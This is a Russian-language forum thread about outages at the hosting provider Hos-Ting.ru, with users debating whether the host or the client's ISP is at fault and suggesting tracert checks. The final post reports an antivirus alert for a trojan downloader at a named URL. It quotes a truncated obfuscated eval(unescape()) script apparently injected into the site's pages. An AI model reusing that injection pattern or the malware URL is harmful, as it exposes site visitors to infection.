Hos-Ting.ru - Качественный хостинг

P
На сайте с 10.02.2008
49
видимо стучали кому то другому

Стучал ICQ#: 468-655-368 Denis, этот же номер ICQ, у вас на сайте, вверху в правом углу, а внизу, электронная почта поддержки, или вы сами может опубликовали номер ICQ кого-то другого, раз не верите, если это так, то достаточно посмотреть история, и найдёте, не надо из людей делать идиотов

уверены что с домашним / рабочим провайдером все в норме? а то бывали случаи что глючил не по детски а думали на наш сервер.

Если вам говорят,что ваш сервер, то надо прежде искать причины у вас, дыма без огня не бывает,

у меня десяток проектов, и все в этот момент работали без проблем, в том числе и по FTP, а один ваш почему-то нет.Конечно тяжело признавать падения и глюки, когда основная задача - набрать клиентов.

DLag
На сайте с 15.08.2007
201
poststork:
Если вам говорят,что ваш сервер, то надо прежде искать причины у вас, дыма без огня не бывает,
у меня десяток проектов, и все в этот момент работали без проблем, в том числе и по FTP, а один ваш почему-то нет.Конечно тяжело признавать падения и глюки, когда основная задача - набрать клиентов.

К примеру я вчера не мог периодически пробиться к одному серверу, но это только потому что РТкомм поставил глючный роутер на заграничные каналы и доступ в датацентр с этими каналами был затруднен.

Таже ситуация может быть и у вас, нужно проверять доступ командой tracert (traceroute в Unix) по IP.

Смотрите где обрывается связь, очень часто бывает что у клиентов не доходит и до выхода на заграницу, а то и до пиринга с другим провайдером, причем это вина канального провайдера.

Если хостер делает предположение, то попробовали бы проверить, т.к. такие предположения строятся на опыте и профессионализме.

Руководитель датацентра UkrNames (http://ukrnames.com/)
P
На сайте с 10.02.2008
49

Да ситуации бывают разные, согласен, от этого не уйдёшь, но если бы это было бы один раз, мне бы наверное было б понятно, но это было неоднократно, а во вторых, как мне кажется профессионализм в том и заключается, что люди,которые предлагают хостинг, хочется надеяться, что они всё протестировали и проверили, мне то от этого не легче станет, если увеличится пинг или на каком узле не приходит ответ при проверке трассировки маршрута. Мы конечные пользователи, платим деньги не за то,чтобы проверять и тестировать, а хотим получить работающий хостинг и качество.

kxk
На сайте с 30.01.2005
990
kxk

DLag, А где этот сервер был расположен? Не думаете что в такие моменты нужно иметь VPN на всякий пожарный для экстренного доступа к серверам из другой подсети тк провайдеры по тем или иным причинам иногда друг друга "блочат":)

Ваш DEVOPS
EX
На сайте с 30.06.2007
182

poststork, при этом надо понимать, что за качество нужно платить...

А если вы платите копейки- то за что заплатили, то и получили:)

P
На сайте с 10.02.2008
49

ну во-первых, у хостера есть тарифный план, если он его выставляет, значит предполагается, что сайты на нём размещённые будут работать, не так ли, во-вторых "копейки" понятие растяжимое, для кого-то может и 200 у.е. в месяц за хостинг тоже копейки, в-третьих это не аргумент, т.к. здесь речь ведётся о работе хостера, в-четвертых, где уверенность, что сменив тарифный план, вы меняете и сервер?

NeoSky
На сайте с 18.01.2008
172

А зачем вам мои ФИО и мой номер квартиры?

Из кожи вон, но лезу в ТОП
P
На сайте с 08.03.2007
250
poststork:
а во вторых, как мне кажется профессионализм в том и заключается, что люди,которые предлагают хостинг, хочется надеяться, что они всё протестировали и проверили, мне то от этого не легче станет, если увеличится пинг или на каком узле не приходит ответ при проверке трассировки маршрута. Мы конечные пользователи, платим деньги не за то,чтобы проверять и тестировать, а хотим получить работающий хостинг и качество.

Немного не понял. Вы хотите от хостера, чтобы он проверял канал от Вашей квартиры до его серверов? Делайте tracert до своего сервера - это будет хорошим аргументом в беседе с провайдером. Загружать же хостера непроверенными жалобами - значит отнимать у него время, которое могло бы пойти на улучшение хостинга и Ваших сайтов в частности.

DLag
На сайте с 15.08.2007
201
kxk:
DLag, А где этот сервер был расположен? Не думаете что в такие моменты нужно иметь VPN на всякий пожарный для экстренного доступа к серверам из другой подсети тк провайдеры по тем или иным причинам иногда друг друга "блочат":)

Мои сервера в Украине, у нас друг друга не блочат, так что не вижу смысла. :)

Этот сервер попросили по дружбе проверить на безопасность и погонять стресс-тесты.

E
На сайте с 07.03.2007
32

При заходе на сайт Hos-Ting.ru сработал Касперский.

26.06.2008 17:52:38 Вредоносный HTTP-объект <http://kemport.net/gpack/index.php//index>: обнаружено: троянская программа 'Trojan-Downloader.JS.Psyme.abm'.

В начале всех страниц скриптик интересный

<script type="text/javascript">

eval(unescape("%64%6f%63%......%65%27%29%3b"));

</script>

Господа, прошу проверить это где-нибудь по дороге цепляется

или хостер такой забавный?

Одна стрела сбивает одного орла. Две стрелы - это уже слишком много

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий